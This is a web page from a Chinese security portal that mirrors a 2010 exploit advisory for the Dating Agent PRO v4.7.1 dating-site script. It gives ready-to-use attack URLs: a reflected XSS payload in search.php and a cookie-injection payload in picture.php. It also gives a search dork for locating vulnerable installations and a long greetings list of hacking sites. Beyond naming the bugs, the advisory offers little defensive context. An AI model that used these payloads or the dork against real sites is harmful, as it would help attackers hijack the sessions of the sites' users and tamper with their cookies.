首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Dating Agent PRO Multi Vulnerability
来源:vfocus.net 作者: indoushka 发布时间:2010-01-04  
========================================================================================                  
| # Title    : Dating Agent PRO Multi Vulnerability                    
| # Author   : indoushka                                                               
| # email    : indoushka@hotmail.com                                                   
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)                                                                     
| # Total alerts found : 2                                                
|                High  : 1                                                                       
|              Medium  : 1                                                                      
|                  Low :                                                                            
|       Informational  :                                                             
| # Web Site : www.iq-ty.com                                                           
| # Published:                                                                         
| # Dork     : Powered by Dating Agent PRO v4.7.1(c) Datetopia.com                                    
| # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu)       
| # Bug      : Multi                                                                     
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
 1- XSS (High)

http://127.0.0.1/ww-dp471/search.php?sex=ram-sdram-32Mb&age1=23&age2=10000&likes=indoushka&maritalstatus=Single&relationship=indoushka@hotmail.com&pictures=on&onlinet=0&search=search&Submit3=Show%20%26gt%3B&login=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&fname=indoushka&lname=Tchalla&country=Algeria&state=NY&city=Souk%20Naamane&yahoo=tchalla06@yahoo.fr&msn=indoushka@hotmail.com&aol=indoushka@hotmail.com&icq=indoushka@hotmail.com&drinker=indoushka@hotmail.com&smoker=Zetla&occupation=Hacker&occupation=Blackhat&height1=0&height2=0&weight1=0&weight2=0&skin=indoushka@hotmail.com&ethnicity=indoushka@hotmail.com&eyes=red&hair=grean&languages=&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&page=1

 2- Cookie manipulation (Medium)
 
 http://127.0.0.1/ww-dp471/picture.php?rating=0&subject=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>&message=indoushka@hotmail.com&send=1&pid=7&Submit2=Send
 
================================   Dz-Ghost Team   ========================================
Greetz : Exploit-db Team (loneferret+Exploits+dookie2000ca)
all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 * www.hackteach.org
Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * www.cyber-mirror.org
www.albasrah-forums.com * www.amman-dj.com * www.forums.ibb7.com * www.maker-sat.com * www.owned-m.com
www.vb.7lanet.com * www.3kalam.com * Stake (v4-team.com) * www.3kalam.com * www.dev-chat.com  
www.al7ra.com * Cyb3r IntRue (avengers team) * www.securityreason.com * www.packetstormsecurity.org
www.sazcart.com * www.best-sec.net * www.app.feeddigest.com * www.forum.brg8.com * www.zone-h.net
www.m-y.cc * www.hacker.ps * no-exploit.com * www.bug-blog.de * www.gem-flash.com * www.soqor.org
www.h4ckf0ru.com * www.bawassil.com * www.host4ll.com * www.hacker-top.com * www.xp10.me 
www.forums.soqor.net * www.alkrsan.net * blackc0der (www.forum.aria-security.com)  
SoldierOfAllah (www.m4r0c-s3curity.cc)www.arhack.net * www.google.com * www.np-alm7bh.com 
www.lyloo59.skyrock.com * www.sec-eviles.com * www.snakespc.com * www.kadmiwe.net * www.syrcafe.com 
www.mriraq.com * www.dzh4cker.l9l.org * www.goyelang.cn * www.h-t.cc * www.arabic-m.com * www.74ck3r.com 
r1z (www.sec-r1z.com) * omanroot.com * www.bdr130.net * www.zac003.persiangig.ir * www.0xblackhat.ir
www.mormoroth.net * www.securitywall.org * www.sec-code.com *
-------------------------------------------------------------------------------------------


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·WD-CMS 3.0 Multiple Vulnerabil
·XlentCMS V1.0.4 (downloads.php
·Multiple XSS in cms WCPS v4.3.
·BlaB! 2.1b2 Backup files Vulne
·(c)Evo-Dev Cross Site Scriptin
·DZOIC Handshakes Auth Bypass S
·VisionGate 1.6 XSS Vulnerabili
·Nero Express v7.9.6.4 Local He
·VirtuaNews - 1.0.4 Pro XSS Vul
·Mini-NUKE v2.3 Freehost Multi
·PHPCart v3.1.2 XSS Vulnerabili
·Switch Sound File Converter .m
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved